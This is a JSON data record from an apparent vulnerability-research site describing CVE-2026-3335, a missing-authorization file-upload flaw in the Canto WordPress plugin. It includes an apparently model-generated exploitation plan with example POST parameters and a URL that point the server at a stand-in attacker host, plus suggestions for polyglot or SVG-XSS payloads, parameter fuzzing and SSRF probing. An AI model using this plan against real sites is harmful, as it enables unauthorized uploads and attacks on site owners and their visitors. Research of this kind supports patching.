[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKxuISA_X6X_zISe8RHOwwcvk82_tsjXCs8aw05bXfHU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-3335","canto-missing-authorization-to-unauthenticated-file-upload","Canto \u003C= 3.1.1 - Missing Authorization to Unauthenticated File Upload","The Canto plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.1.1 via the `\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php` file. This is due to the file being directly accessible without any authentication, authorization, or nonce checks, and the `fbc_flight_domain` and `fbc_app_api` URL components being accepted as user-supplied POST parameters rather than read from admin-configured options. Since the attacker controls both the destination server and the `fbc_app_token` value, the entire fetch-and-upload chain is attacker-controlled — the server never contacts Canto's legitimate API, and the uploaded file originates entirely from the attacker's infrastructure. This makes it possible for unauthenticated attackers to upload arbitrary files (constrained to WordPress-allowed MIME types) to the WordPress uploads directory. Additional endpoints (`detail.php`, `download.php`, `get.php`, `tree.php`) are also directly accessible without authentication and make requests using a user-supplied `app_api` parameter combined with an admin-configured subdomain.","canto",null,"\u003C=3.1.1","3.1.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-20 15:13:52","2026-05-12 19:57:44",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0777f759-6980-4572-a866-0210bd5f5085?source=api-prod",53,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3335 (Canto \u003C= 3.1.1)\n\n## 1. Vulnerability Summary\nThe **Canto** plugin for WordPress is vulnerable to **Unauthenticated Arbitrary File Upload** (restricted to WordPress-allowed MIME types) due to missing authorization and improper input validation in the standalone PHP file `\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php`. \n\nThe core issue is that this file can be accessed directly without loading the WordPress environment's standard security checks (if accessed before `wp-load.php` or if it includes `wp-load.php` without checking `is_user_logged_in()`). Furthermore, the script accepts critical configuration parameters—`fbc_flight_domain`, `fbc_app_api`, and `fbc_app_token`—directly from POST\u002FGET requests. An attacker can point these parameters to a server they control, causing the WordPress server to fetch and \"sideload\" a file from the attacker's infrastructure into the WordPress Media Library.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php`\n*   **Alternative Endpoints (Inferred):** `detail.php`, `download.php`, `get.php`, `tree.php` (likely in the same directory).\n*   **Attack Type:** Missing Authorization \u002F Unauthenticated File Upload via SSRF-like fetch.\n*   **Parameters:**\n    *   `fbc_flight_domain`: The domain of the \"Canto\" instance to fetch from (attacker-controlled).\n    *   `fbc_app_api`: The API path\u002Fendpoint on the remote server.\n    *   `fbc_app_token`: The authentication token for the remote server (attacker-defined).\n    *   `name` (inferred): Likely the filename to save as.\n    *   `id` or `path` (inferred): Likely the identifier of the file on the remote server.\n*   **Authentication:** None required.\n\n## 3. Code Flow\n1.  **Direct Request:** An unauthenticated user sends a POST request to `copy-media.php`.\n2.  **Parameter Extraction:** The script reads `$_POST['fbc_flight_domain']`, `$_POST['fbc_app_api']`, and `$_POST['fbc_app_token']`.\n3.  **Request Construction:** The script constructs an HTTP request (likely using `wp_remote_get` or `curl`) to `https:\u002F\u002F{fbc_flight_domain}\u002F{fbc_app_api}\u002F...` using the provided token.\n4.  **Remote Fetch:** The WordPress server connects to the attacker-controlled domain.\n5.  **Sideloading:** The script receives the file content from the attacker's server and calls a WordPress function like `wp_handle_sideload()` or `media_handle_sideload()` to save the file into the `wp-content\u002Fuploads\u002F` directory and create an attachment in the database.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this endpoint is **directly accessible without any nonce checks**. \n*   No nonce is required because the file is accessed outside the standard `admin-ajax.php` or REST API flow where nonces are typically enforced.\n*   **Bypass Confirmation:** The research should confirm if `copy-media.php` includes `wp-load.php`. If it doesn't, it might be using raw PHP `file_put_contents`, which is even more dangerous. If it does, it's missing the `current_user_can()` check.\n\n## 5. Exploitation Strategy\n\n### Step 1: Attacker Infrastructure Setup\nThe attacker must host a file and an API endpoint that mimics the Canto API response.\n*   **Mock Canto API:** Create a listener (e.g., using `http_request` or a simple webhook) that returns a file when queried.\n*   **Payload:** A file named `exploit.png`. While the description says it's constrained to allowed MIME types, a polyglot file or a file that can be leveraged later (like an SVG with XSS) should be used.\n\n### Step 2: Triggering the Upload\nSend a POST request to the target's vulnerable script.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002F\u003Ctarget-ip>:8080\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters (Inferred from description):**\n    ```\n    fbc_flight_domain=attacker-controlled-server.com\n    &fbc_app_api=api\u002Fv1\u002Fget-file\n    &fbc_app_token=any-token\n    &name=malicious-image.png\n    &id=123\n    ```\n\n### Step 3: Response Analysis\nThe script will likely return a JSON response or a success message if the sideloading was successful.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install canto --version=3.1.1 --activate`\n2.  **Verify File Existence:** Confirm `\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fcopy-media.php` exists.\n3.  **Public Access Check:** Ensure the plugin directory allows direct execution of PHP files (standard in default WordPress installs).\n\n## 7. Expected Results\n*   The WordPress server makes an outbound HTTP request to the `fbc_flight_domain`.\n*   A new file appears in the `\u002Fwp-content\u002Fuploads\u002FYYYY\u002FMM\u002F` directory.\n*   A new entry is created in the `wp_posts` table with `post_type = 'attachment'`.\n*   The HTTP response from `copy-media.php` returns a `200 OK` status, possibly containing the ID or URL of the newly created attachment.\n\n## 8. Verification Steps\n1.  **Check Media Library:** Use WP-CLI to list recent attachments.\n    ```bash\n    wp post list --post_type=attachment --posts_per_page=5 --orderby=post_date --order=desc\n    ```\n2.  **Verify Filesystem:** Check for the presence of the file in the uploads folder.\n    ```bash\n    find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads -name \"malicious-image.png\"\n    ```\n3.  **Verify Unauthenticated Access:** Repeat the HTTP request without any cookies to confirm no session is required.\n\n## 9. Alternative Approaches\nIf `copy-media.php` requires specific parameters not fully detailed in the CVSS description:\n1.  **Fuzzing Parameters:** Fuzz the script for common sideloading parameters like `file_url`, `url`, `download_url`, or `path`.\n2.  **Check Other Endpoints:** If `copy-media.php` is restricted, test `download.php` or `get.php` in the same directory:\n    *   `http:\u002F\u002F\u003Ctarget>\u002Fwp-content\u002Fplugins\u002Fcanto\u002Fincludes\u002Flib\u002Fdownload.php?app_api=http:\u002F\u002Fattacker.com\u002Fmalicious.png`\n3.  **Information Leakage:** Test `tree.php` or `detail.php` to see if they disclose internal paths or configurations by pointing `app_api` to a local resource (SSRF).","gemini-3-flash-preview","2026-04-18 00:55:21","2026-04-18 00:55:39",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcanto\u002Ftags"]